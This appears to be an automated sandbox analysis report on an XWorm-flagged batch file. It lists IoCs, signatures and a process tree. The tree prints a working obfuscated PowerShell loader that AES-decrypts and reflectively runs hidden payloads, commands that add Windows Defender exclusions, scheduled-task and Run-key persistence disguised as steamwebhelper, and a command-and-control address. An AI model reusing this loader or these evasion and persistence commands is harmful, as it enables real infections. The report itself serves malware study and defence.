Analysis
-
max time kernel
150s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2024 14:03
Static task
static1
Behavioral task
behavioral1
Sample
coin.b.bat
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
coin.b.bat
Resource
win10v2004-20240508-en
General
-
Target
coin.b.bat
-
Size
91KB
-
MD5
520c1190bbbe3a7359a6e72f76618245
-
SHA1
50d5e441a97aad127e8d5ad8c28c848b3be02c5d
-
SHA256
91813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0
-
SHA512
98ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749
-
SSDEEP
1536:HtkPhsAgh2YhIXwWIN0hdI7E5WQTpJlqb3mE81vT1dkYHcga3kplWaEDN4nVoLuR:NeCAgX+vIuEE5PlJAb3mE81L1dkhX3mV
Malware Config
Extracted
xworm
continue-silk.gl.at.ply.gg:58347
127.0.0.1:58347
-
Install_directory
%Temp%
-
install_file
steamwebhelper.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1156-51-0x00000159699F0000-0x0000015969A06000-memory.dmp family_xworm -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 34 1156 powershell.exe 47 1156 powershell.exe 49 1156 powershell.exe 79 1156 powershell.exe 81 1156 powershell.exe 82 1156 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2240 powershell.exe 4808 powershell.exe 1156 powershell.exe 3696 powershell.exe 4328 powershell.exe 4480 powershell.exe 1728 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\steamwebhelper.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\steamwebhelper.lnk powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
seroxen.lib.exesteamwebhelper.exepid process 5064 seroxen.lib.exe 4392 steamwebhelper.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\steamwebhelper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\steamwebhelper.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 33 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesteamwebhelper.exemsedge.exemsedge.exeidentity_helper.exepid process 2240 powershell.exe 2240 powershell.exe 4808 powershell.exe 4808 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 4328 powershell.exe 4328 powershell.exe 4328 powershell.exe 4480 powershell.exe 4480 powershell.exe 4480 powershell.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 4392 steamwebhelper.exe 4392 steamwebhelper.exe 4392 steamwebhelper.exe 4600 msedge.exe 4600 msedge.exe 1868 msedge.exe 1868 msedge.exe 2060 identity_helper.exe 2060 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe Token: 34 4808 powershell.exe Token: 35 4808 powershell.exe Token: 36 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe Token: 34 4808 powershell.exe Token: 35 4808 powershell.exe Token: 36 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe Token: 34 4808 powershell.exe Token: 35 4808 powershell.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
Processes:
msedge.exepowershell.exepid process 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1156 powershell.exe -
Suspicious use of SendNotifyMessage 40 IoCs
Processes:
msedge.exepid process 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
powershell.exemsedge.exepid process 1156 powershell.exe 1868 msedge.exe 1868 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exemsedge.exedescription pid process target process PID 212 wrote to memory of 2240 212 cmd.exe powershell.exe PID 212 wrote to memory of 2240 212 cmd.exe powershell.exe PID 2240 wrote to memory of 4808 2240 powershell.exe powershell.exe PID 2240 wrote to memory of 4808 2240 powershell.exe powershell.exe PID 2240 wrote to memory of 4436 2240 powershell.exe WScript.exe PID 2240 wrote to memory of 4436 2240 powershell.exe WScript.exe PID 4436 wrote to memory of 1356 4436 WScript.exe cmd.exe PID 4436 wrote to memory of 1356 4436 WScript.exe cmd.exe PID 1356 wrote to memory of 1156 1356 cmd.exe powershell.exe PID 1356 wrote to memory of 1156 1356 cmd.exe powershell.exe PID 1156 wrote to memory of 5064 1156 powershell.exe seroxen.lib.exe PID 1156 wrote to memory of 5064 1156 powershell.exe seroxen.lib.exe PID 1156 wrote to memory of 5064 1156 powershell.exe seroxen.lib.exe PID 1156 wrote to memory of 3696 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 3696 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 4328 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 4328 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 4480 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 4480 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 1728 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 1728 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 1724 1156 powershell.exe schtasks.exe PID 1156 wrote to memory of 1724 1156 powershell.exe schtasks.exe PID 1156 wrote to memory of 1868 1156 powershell.exe msedge.exe PID 1156 wrote to memory of 1868 1156 powershell.exe msedge.exe PID 1868 wrote to memory of 2252 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 2252 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe PID 1868 wrote to memory of 772 1868 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\coin.b.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Local\Temp\coin.b.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_164_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_164.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_164.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_164.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Roaming\startup_str_164.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe"C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'steamwebhelper.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "steamwebhelper" /tr "C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe"6⤵
- Creates scheduled task(s)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed3d246f8,0x7ffed3d24708,0x7ffed3d247187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:17⤵
-
C:\Windows\SYSTEM32\CMD.EXE"CMD.EXE"6⤵
-
C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exeC:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
